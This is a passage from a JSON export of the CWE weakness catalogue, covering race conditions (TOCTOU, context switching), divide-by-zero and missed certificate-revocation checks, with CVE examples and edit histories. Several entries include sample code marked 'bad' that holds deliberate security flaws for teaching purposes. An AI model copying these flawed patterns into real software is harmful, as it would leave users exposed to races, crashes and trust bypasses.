attacker would not otherwise be allowed perform, then it is a possible target."},{"attr":{"@_Demonstrative_Example_ID":"DX-49"},"Intro_Text":"This code prints the contents of a file if a user has permission.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"PHP"},"xhtml:div":{"#text":"function readFile($filename){}","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"$user = getCurrentUser();if(is_link($filename)){}if(fileowner($filename) == $user){}else{}","xhtml:br":["","","","","",""],"xhtml:i":"//resolve file if its a symbolic link","xhtml:div":[{"#text":"$filename = readlink($filename);","attr":{"@_style":"margin-left:10px;"}},{"#text":"echo file_get_contents($realFile);return;","attr":{"@_style":"margin-left:10px;"},"xhtml:br":""},{"#text":"echo \'Access denied\';return false;","attr":{"@_style":"margin-left:10px;"},"xhtml:br":""}]}}}},"Body_Text":"This code attempts to resolve symbolic links before checking the file and printing its contents. However, an attacker may be able to change the file from a real file to a symbolic link between the calls to is_link() and file_get_contents(), allowing the reading of arbitrary files. Note that this code fails to log the attempted access (CWE-778)."}]},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2003-0813","Description":"A multi-threaded race condition allows remote attackers to cause a denial of service (crash or reboot) by causing two threads to process the same RPC request, which causes one thread to use memory after it has been freed.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0813"},{"Reference":"CVE-2004-0594","Description":"PHP flaw allows remote attackers to execute arbitrary code by aborting execution before the initialization of key data structures is complete.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0594"},{"Reference":"CVE-2008-2958","Description":"chain: time-of-check time-of-use (TOCTOU) race condition in program allows bypass of protection mechanism that was designed to prevent symlink attacks.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-2958"},{"Reference":"CVE-2008-1570","Description":"chain: time-of-check time-of-use (TOCTOU) race condition in program allows bypass of protection mechanism that was designed to prevent symlink attacks.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-1570"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"Time-of-check Time-of-use race condition"},{"attr":{"@_Taxonomy_Name":"7 Pernicious Kingdoms"},"Entry_Name":"File Access Race Conditions: TOCTOU"},{"attr":{"@_Taxonomy_Name":"CLASP"},"Entry_Name":"Time of check, time of use race condition"},{"attr":{"@_Taxonomy_Name":"CERT C Secure Coding"},"Entry_ID":"FIO01-C","Entry_Name":"Be careful using functions that use file names for identification"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP20","Entry_Name":"Race Condition Window"}]},"Related_Attack_Patterns":{"Related_Attack_Pattern":[{"attr":{"@_CAPEC_ID":"27"}},{"attr":{"@_CAPEC_ID":"29"}}]},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-18"}},{"attr":{"@_External_Reference_ID":"REF-367"}},{"attr":{"@_External_Reference_ID":"REF-44","@_Section":"&#34;Sin 13: Race Conditions.&#34; Page 205"}},{"attr":{"@_External_Reference_ID":"REF-62","@_Section":"Chapter 9, &#34;TOCTOU&#34;, Page 527"}}]},"Notes":{"Note":[{"#text":"TOCTOU issues do not always involve symlinks, and not every symlink issue is a TOCTOU problem.","attr":{"@_Type":"Relationship"}},{"#text":"Non-symlink TOCTOU issues are not reported frequently, but they are likely to occur in code that attempts to be secure.","attr":{"@_Type":"Research Gap"}}]},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Organization":"KDM Analytics","Modification_Date":"2008-08-01","Modification_Comment":"added/updated white box definitions"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Common_Consequences, Relationships, Other_Notes, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-10-14","Modification_Comment":"updated Description, Name, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-11-24","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-01-12","Modification_Comment":"updated Alternate_Terms, Observed_Examples, Other_Notes, References, Relationship_Notes, Relationships, Research_Gaps"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-05-27","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"KDM Analytics","Modification_Date":"2009-07-17","Modification_Comment":"Improved the White_Box_Definition"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-07-27","Modification_Comment":"updated White_Box_Definitions"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-09-27","Modification_Comment":"updated Description, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-12-13","Modification_Comment":"updated Alternate_Terms, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-27","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-09-13","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Demonstrative_Examples, Observed_Examples, References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Demonstrative_Examples, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms, Demonstrative_Examples, Likelihood_of_Exploit, References, Relationships, Taxonomy_Mappings, White_Box_Definitions"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-06-20","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated References, Relationships"}],"Previous_Entry_Name":{"#text":"Time-of-check Time-of-use Race Condition","attr":{"@_Date":"2008-10-14"}}}},"368":{"attr":{"@_ID":"368","@_Name":"Context Switching Race Condition","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Draft"},"Description":"A product performs a series of non-atomic actions to switch between contexts that cross privilege or other security boundaries, but a race condition allows an attacker to modify or misrepresent the product\'s behavior during the switch.","Extended_Description":"This is commonly seen in web browser vulnerabilities in which the attacker can perform certain actions while the browser is transitioning from a trusted to an untrusted domain, or vice versa, and the browser performs the actions on one domain using the trust level and resources of the other domain.","Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"362","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"CanAlsoBe","@_CWE_ID":"364","@_View_ID":"1000"}}]},"Weakness_Ordinalities":{"Weakness_Ordinality":[{"Ordinality":"Primary","Description":"This weakness can be primary to almost anything, depending on the context of the race condition."},{"Ordinality":"Resultant","Description":"This weakness can be resultant from insufficient compartmentalization (CWE-653), incorrect locking, improper initialization or shutdown, or a number of other weaknesses."}]},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation"}]},"Common_Consequences":{"Consequence":{"Scope":["Integrity","Confidentiality"],"Impact":["Modify Application Data","Read Application Data"]}},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2009-1837","Description":"Chain: race condition (CWE-362) from improper handling of a page transition in web client while an applet is loading (CWE-368) leads to use after free (CWE-416)","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1837"},{"Reference":"CVE-2004-2260","Description":"Browser updates address bar as soon as user clicks on a link instead of when the page has loaded, allowing spoofing by redirecting to another page using onUnload method. ** this is one example of the role of \\"hooks\\" and context switches, and should be captured somehow - also a race condition of sorts **","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-2260"},{"Reference":"CVE-2004-0191","Description":"XSS when web browser executes Javascript events in the context of a new page while it\'s being loaded, allowing interaction with previous page in different domain.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0191"},{"Reference":"CVE-2004-2491","Description":"Web browser fills in address bar of clicked-on link before page has been loaded, and doesn\'t update afterward.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-2491"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"Context Switching Race Condition"}},"Related_Attack_Patterns":{"Related_Attack_Pattern":[{"attr":{"@_CAPEC_ID":"26"}},{"attr":{"@_CAPEC_ID":"29"}}]},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-44","@_Section":"&#34;Sin 13: Race Conditions.&#34; Page 205"}}},"Notes":{"Note":[{"#text":"Can overlap signal handler race conditions.","attr":{"@_Type":"Relationship"}},{"#text":"Under-studied as a concept. Frequency unknown; few vulnerability reports give enough detail to know when a context switching race condition is a factor.","attr":{"@_Type":"Research Gap"}}]},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Other_Notes, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-07-27","Modification_Comment":"updated Description, Other_Notes, Relationship_Notes, Weakness_Ordinalities"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-12-13","Modification_Comment":"updated Observed_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"}]}},"369":{"attr":{"@_ID":"369","@_Name":"Divide By Zero","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Draft"},"Description":"The product divides a value by zero.","Extended_Description":"This weakness typically occurs when an unexpected value is provided to the product, or if an error occurs that is not properly detected. It frequently occurs in calculations involving physical dimensions such as size, length, width, and height.","Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"682","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"682","@_View_ID":"1003","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"682","@_View_ID":"1305","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"682","@_View_ID":"1340","@_Ordinal":"Primary"}}]},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation"}},"Likelihood_Of_Exploit":"Medium","Common_Consequences":{"Consequence":{"Scope":"Availability","Impact":"DoS: Crash, Exit, or Restart","Note":"A Divide by Zero results in a crash."}},"Demonstrative_Examples":{"Demonstrative_Example":[{"Intro_Text":"The following Java example contains a function to compute an average but does not validate that the input value used as the denominator is not zero. This will create an exception for attempting to divide by zero. If this error is not handled by Java exception handling, unexpected results can occur.","Example_Code":[{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"public int computeAverageResponseTime (int totalTime, int numRequests) {}","xhtml:div":{"#text":"return totalTime / numRequests;","attr":{"@_style":"margin-left:10px;"}}}},{"attr":{"@_Nature":"good"},"xhtml:div":{"#text":"public int computeAverageResponseTime (int totalTime, int numRequests) throws ArithmeticException {}","xhtml:div":{"#text":"if (numRequests == 0) {}return totalTime / numRequests;","attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"System.out.println(\\"Division by zero attempted!\\");throw ArithmeticException;","attr":{"@_style":"margin-left:10px;"},"xhtml:br":""},"xhtml:br":""}}}],"Body_Text":"By validating the input value used as the denominator the following code will ensure that a divide by zero error will not cause unexpected results. The following Java code example will validate the input value, output an error message, and throw an exception."},{"Intro_Text":"The following C/C++ example contains a function that divides two numeric values without verifying that the input value used as the denominator is not zero. This will create an error for attempting to divide by zero, if this error is not caught by the error handling capabilities of the language, unexpected results can occur.","Example_Code":[{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":{"#text":"double divide(double x, double y){}","xhtml:div":{"#text":"return x/y;","attr":{"@_style":"margin-left:10px;"}}}},{"attr":{"@_Nature":"good"},"xhtml:div":{"#text":"const int DivideByZero = 10;double divide(double x, double y){}...try{}catch( int i ){}","xhtml:br":["","","",""],"xhtml:div":[{"#text":"if ( 0 == y ){}return x/y;","attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"throw DivideByZero;","attr":{"@_style":"margin-left:10px;"}},"xhtml:br":""},{"#text":"divide(10, 0);","attr":{"@_style":"margin-left:10px;"}},{"#text":"if(i==DivideByZero) {}","attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"cerr&lt;&lt;\\"Divide by zero error\\";","attr":{"@_style":"margin-left:10px;"}}}]}}],"Body_Text":"By validating the input value used as the denominator the following code will ensure that a divide by zero error will not cause unexpected results. If the method is called and a zero is passed as the second argument a DivideByZero error will be thrown and should be caught by the calling block with an output message indicating the error.","References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-371"}}}},{"Intro_Text":"The following C# example contains a function that divides two numeric values without verifying that the input value used as the denominator is not zero. This will create an error for attempting to divide by zero, if this error is not caught by the error handling capabilities of the language, unexpected results can occur.","Example_Code":[{"attr":{"@_Nature":"bad","@_Language":"C#"},"xhtml:div":{"#text":"int Division(int x, int y){}","xhtml:div":{"#text":"return (x / y);","attr":{"@_style":"margin-left:10px;"}}}},{"attr":{"@_Nature":"good"},"xhtml:div":{"#text":"int SafeDivision(int x, int y){}","xhtml:div":{"#text":"try{}catch (System.DivideByZeroException dbz){}","attr":{"@_style":"margin-left:10px;"},"xhtml:div":[{"#text":"return (x / y);","attr":{"@_style":"margin-left:10px;"}},{"#text":"System.Console.WriteLine(\\"Division by zero attempted!\\");return 0;","attr":{"@_style":"margin-left:10px;"},"xhtml:br":""}],"xhtml:br":""}}}],"Body_Text":"The method can be modified to raise, catch and handle the DivideByZeroException if the input value used as the denominator is zero.","References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-372"}}}}]},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2007-3268","Description":"Invalid size value leads to divide by zero.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-3268"},{"Reference":"CVE-2007-2723","Description":"\\"Empty\\" content triggers divide by zero.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-2723"},{"Reference":"CVE-2007-2237","Description":"Height value of 0 triggers divide by zero.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-2237"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"OWASP Top Ten 2004"},"Entry_ID":"A9","Entry_Name":"Denial of Service","Mapping_Fit":"CWE More Specific"},{"attr":{"@_Taxonomy_Name":"CERT C Secure Coding"},"Entry_ID":"FLP03-C","Entry_Name":"Detect and handle floating point errors"},{"attr":{"@_Taxonomy_Name":"CERT C Secure Coding"},"Entry_ID":"INT33-C","Entry_Name":"Ensure that division and remainder operations do not result in divide-by-zero errors","Mapping_Fit":"Exact"},{"attr":{"@_Taxonomy_Name":"The CERT Oracle Secure Coding Standard for Java (2011)"},"Entry_ID":"NUM02-J","Entry_Name":"Ensure that division and modulo operations do not result in divide-by-zero errors"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP1","Entry_Name":"Glitch in computation"}]},"Content_History":{"Submission":{"Submission_Name":"CWE Community","Submission_Date":"2008-04-11","Submission_Comment":"Submitted by members of the CWE community to extend early CWE versions"},"Modification":[{"Modification_Name":"Sean Eidemiller","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"added/updated demonstrative examples"},{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Common_Consequences, Description, Relationships, Other_Notes, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-11-24","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-05-27","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-10-29","Modification_Comment":"updated Other_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-09-13","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2015-12-07","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Demonstrative_Examples, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-08-20","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-12-10","Modification_Comment":"updated Relationships"}]}},"370":{"attr":{"@_ID":"370","@_Name":"Missing Check for Certificate Revocation after Initial Check","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Draft"},"Description":"The software does not check the revocation status of a certificate after its initial revocation check, which can cause the software to perform privileged actions even after the certificate is revoked at a later time.","Extended_Description":"If the revocation status of a certificate is not checked before each action that requires privileges, the system may be subject to a race condition. If a certificate is revoked after the initial check, all subsequent actions taken with the owner of the revoked certificate will lose all benefits guaranteed by the certificate. In fact, it is almost certain that the use of a revoked certificate indicates malicious activity.","Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"299","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"PeerOf","@_CWE_ID":"296","@_View_ID":"1000"}},{"attr":{"@_Nature":"PeerOf","@_CWE_ID":"297","@_View_ID":"1000"}},{"attr":{"@_Nature":"PeerOf","@_CWE_ID":"298","@_View_ID":"1000"}}]},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design","Note":"OMISSION: This weakness is caused by missing a security tactic during the architecture and design phase."},{"Phase":"Implementation"}]},"Likelihood_Of_Exploit":"Medium","Common_Consequences":{"Consequence":[{"Scope":"Access Control","Impact":"Gain Privileges or Assume Identity","Note":"Trust may be assigned to an entity who is not who it claims to be."},{"Scope":"Integrity","Impact":"Modify Application Data","Note":"Data from an untrusted (and possibly malicious) source may be integrated."},{"Scope":"Confidentiality","Impact":"Read Application Data","Note":"Data may be disclosed to an entity impersonating a trusted entity, resulting in information disclosure."}]},"Potential_Mitigations":{"Mitigation":{"Phase":"Architecture and Design","Description":"Ensure that certificates are checked for revoked status before each use of a protected resource. If the certificate is checked before each access of a protected resource, the delay subject to a possible race condition becomes almost negligible and significantly reduces the risk associated with this issue."}},"Demonstrative_Examples":{"Demonstrative_Example":{"Intro_Text":"The following code checks a certificate before performing an action.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":{"#text":"if (cert = SSL_get_peer_certificate(ssl)) {","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"foo=SSL_get_verify_result(ssl);if (X509_V_OK==foo)","xhtml:br":"","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"foo=SSL_get_verify_result(ssl);","xhtml:br":["","","",""],"xhtml:i":["//do stuff","//do more stuff without the check."]}}}}}},"Body_Text":"While the code performs the certificate verification before each action, it does not check the result of the verification after the initial attempt. The certificate may have been revoked in the time between the privileged actions."}},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"CLASP"},"Entry_Name":"Race condition in checking for certificate revocation"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP20","Entry_Name":"Race Condition Window"}]},"Related_Attack_Patterns":{"Related_Attack_Pattern":[{"attr":{"@_CAPEC_ID":"26"}},{"attr":{"@_CAPEC_ID":"29"}}]},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-18"}},{"attr":{"@_External_Reference_ID":"REF-44","@_Section":"&#34;Sin 13: Race Conditions.&#34; Page 205"}}]},"Content_History":{"Submission":{"Submission_Name":"CLASP","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Common_Consequences, Relationships, Other_Notes, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-10-14","Modification_Comment":"updated Description, Other_Notes, Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-05-27","Modification_Comment":"updated Name, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2013-02-21","Modification_Comment":"updated Applicable_Platforms, Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Demonstrative_Examples, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Demonstrative_Examples, Modes_of_Introduction, Relationships, Type"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated References, Relationships"}],"Previous_Entry_Name":{"#text":"Race Condition in Checking for Certificate Revocation","attr":{"@_Date":"2009-05-27"}}}},"372":{"attr":{"@_ID":"372","@_Name":"Incomplete Internal State Distinction","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Draft"},"Description":"The software does not properly determine which state it is in, causing it to assume it is in state X when in fact it is in state Y, causing it to perform incorrect operations in a security-relevant manner.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"664","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation"}]},"Common_Consequences":{"Consequence":{"Scope":["Integrity","Other"],"Impact":["Varies by Context","Unexpected State"]}},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"Incomplete Internal State Distinction"}},"Related_Attack_Patterns":{"Related_Attack_Pattern":[{"attr":{"@_CAPEC_ID":"140"}},{"attr":{"@_CAPEC_ID":"74"}}]},"Notes":{"Note":[{"#text":"This conceptually overlaps other categories such as insufficient verification, but this entry refers to the product\'s incorrect perception of its own state.","attr":{"@_Type":"Relationship"}},{"#text":"This is probably resultant from other weaknesses such as unhandled error conditions, inability to handle out-of-order steps, multiple interpretation errors, etc.","attr":{"@_Type":"Relationship"}},{"#text":"This entry is being considered for deprecation.  It was poorly-defined in PLOVER and is not easily described using the behavior/resource/property model of vulnerability theory.","attr":{"@_Type":"Maintenance"}}]},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Maintenance_Notes, Relationships, Relationship_Notes, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-12-13","Modification_Comment":"updated Maintenance_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-27","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-05-03","Modification_Comment":"updated Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2018-03-27","Modification_Comment":"updated Maintenance_Notes, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-06-20","Modification_Comment":"updated Related_Attack_Patterns"}]}},"373":{"attr":{"@_ID":"373","@_Name":"DEPRECATED: State Synchronization Error","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Deprecated"},"Description":"This entry was deprecated because it overlapped the same concepts as race condition (CWE-362) and Improper Synchronization (CWE-662).","Content_History":{"Submission":{"Submission_Name":"CLASP","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Common_Consequences, Relationships, Other_Notes, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-12-12","Modification_Importance":"Critical","Modification_Comment":"Deprecated entry"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-12-13","Modification_Comment":"updated Applicable_Platforms, Common_Consequences, Demonstrative_Examples, Description, Likelihood_of_Exploit, Name, Other_Notes, Potential_Mitigations, Relationships, Taxonomy_Mappings, Time_of_Introduction, Type"}],"Previous_Entry_Name":{"#text":"State Synchronization Error","attr":{"@_Date":"2010-12-13"}}}},"374":{"attr":{"@_ID":"374","@_Name":"Passing Mutable Objects to an Untrusted Method","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Draft"},"Description":"The program sends non-cloned mutable data as an argument to a method or function.","Extended_Description":"The function or method that has been called can alter or delete the mutable data. This could violate assumptions that the calling function has made about its state. In situations where unknown code is called with references to mutable data, this external code could make changes to the data sent. If this data was not previously cloned, the modified data might not be valid in the context of 